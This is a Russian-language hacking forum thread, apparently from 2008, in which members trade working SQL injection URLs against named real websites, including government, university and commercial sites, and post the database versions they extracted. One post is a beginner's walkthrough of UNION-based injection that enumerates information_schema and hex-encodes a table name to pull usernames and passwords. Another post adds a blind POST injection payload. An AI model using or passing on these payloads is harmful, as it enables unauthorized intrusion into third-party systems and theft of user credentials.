05.12.2008, 13:45
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
http://www.buywithconfidence.gov.uk/tradeCategory.php?id=-158+union+select+1,version(),3,4,5/*
4.1.22-standard
|
|
|
05.12.2008, 18:28
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
http://www.warrenpointharbour.co.uk/service_details.php?category_id=1+order+by+15 - воть!!! Что-то переадресация с union select не АЙС!! Тама сами крутите если получится, напишу!!
|
|
|
|
05.12.2008, 18:32
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
Воть еще тоже с переадресацией http://www.polymercentre.ru/show.php?id=180'+order+by+1&PHPSESSID=3e29a48f71b1 4b1eae4ce3161e65ac50
Последний раз редактировалось BanQui; 05.12.2008 в 18:35..
|
|
|
|
05.12.2008, 18:54
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
Вот еще http://www.axonsport.ru/doc/doc.php?ID=35'
|
|
|
|
05.12.2008, 19:24
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
Воть крутанул : http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4
Версия: 5.0.45
Воть для новичков разжую:
http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4 - Так узнаем версию
Поскольку версия 5+ то в ней присутсвует - information_schema .... начинаем копаться в ней!!!
http://vklybe.ru/index.php?o=g&id=-167+union+select+table_name,2,3,4+from+information _schema.tables+limit+17,1 и так меняем до +limit+87,1 тама смарите, что вам нужно!
Каким же способом посмареть дапустим таблицу modx_web_users - это limit+85,1 ?? Да очень просто!!! Идем на сайт http://k0x.ru/encoder/index.php ! И в поле Text* пишем modx_web_users и жмем Send! После тама появятся поля, нам нужно самое первое, тобишь HEX тама будет вот такое 0x6d6f64785f7765625f7573657273 ! Это Sql HEX ! Вообще можно просто перевести слово через любую вашу прогу(сайт) и просто добавляем 0x ! Вот такой запрос нужно сделать после того как мы узнали Hex код таблицы modx_web_users :
http://vklybe.ru/index.php?o=g&id=-167+union+select+column_name,2,3,4+from+informatio n_schema.columns+where+table_name=0x6d6f64785f7765 625f7573657273+limit+1,1
Ну вот мы нашли всеми долгожданный username и password ! всё также просматривается через limit+1,1 , limit+2,1 и т.д.
Ну потом смотрим юзернаймы и пассы!!!
|
|
|
|
05.12.2008, 19:26
|
|
Новичок
Регистрация: 26.07.2008
Сообщений: 23
С нами:
9364428
Репутация:
20
|
|
4.1.20
Код:
http://www.communityaction.us/index.php?id=-392+union+select+version()/*
5.0.67-log(Windows)
Код:
http://inuitcircumpolar.indelta.ca/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x40,table_schema,table_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+information_schema.tables+limit+17,1--&Lang=En
5.0.45-log
Код:
http://www.cpod.org.au/feed.php?id=6+and+1=0+union+select+1,2,3,version(),table_schema,6,table_name,8+from+information_schema.tables+limit+109,1/*
|
|
|
|
05.12.2008, 22:39
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
BanQui
http://www.axonsport.ru/doc/doc.php?ID=35'+union+select+1,2,version(),4/*
|
|
|
|
05.12.2008, 23:31
|
|
Новичок
Регистрация: 03.11.2008
Сообщений: 25
С нами:
9221159
Репутация:
20
|
|
http://www.choice s.edu/resources/detail.php?id=-26+union+select+1,unhex(hex(version())),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28--
4.1.14-log
http://www.fis k.edu/page.asp?id=158+and+1=-1+union+select+1,@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: )
http://www.cese.utulsa.edu/content.jsp?id=-17+union+select+1,database(),3--
Последний раз редактировалось plutus; 06.12.2008 в 00:02..
|
|
|
|
06.12.2008, 01:00
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
Помогите раскрутить http://db.zenyro.ru/items/potions/detail/575l.htm'
|
|
|
|
06.12.2008, 02:43
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами:
11269766
Репутация:
345
|
|
Сообщение от BanQui
Помогите раскрутить http://db.zenyro.ru/items/potions/detail/575l.htm'
Крутить данную бестолку, т.к. ничего интересного этот запрос не представляет. Есть более удобный файл с ПОСТ запросом. Времяни на это у меня нет, но скажу по секрету, что версия Мускула там 5ая, а это значит есть information_schema. Для работы лучше используй тулзу на PHP из этой темы https://forum.antichat.ru/thread19844.html (нижний пост).
POST http://ТОТСАЙТ.ru/mob_search.html HTTP/1.0
Host: ТОТСАЙТ.ru
filter[mod_name]=mob_search&filter[name]=Fabre%'+AND+SUBSTRING((SELECT+version()+FROM+ragn adb.mob_db+LIMIT+0,1),1,1)=5#
Вот о чем я примерно.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
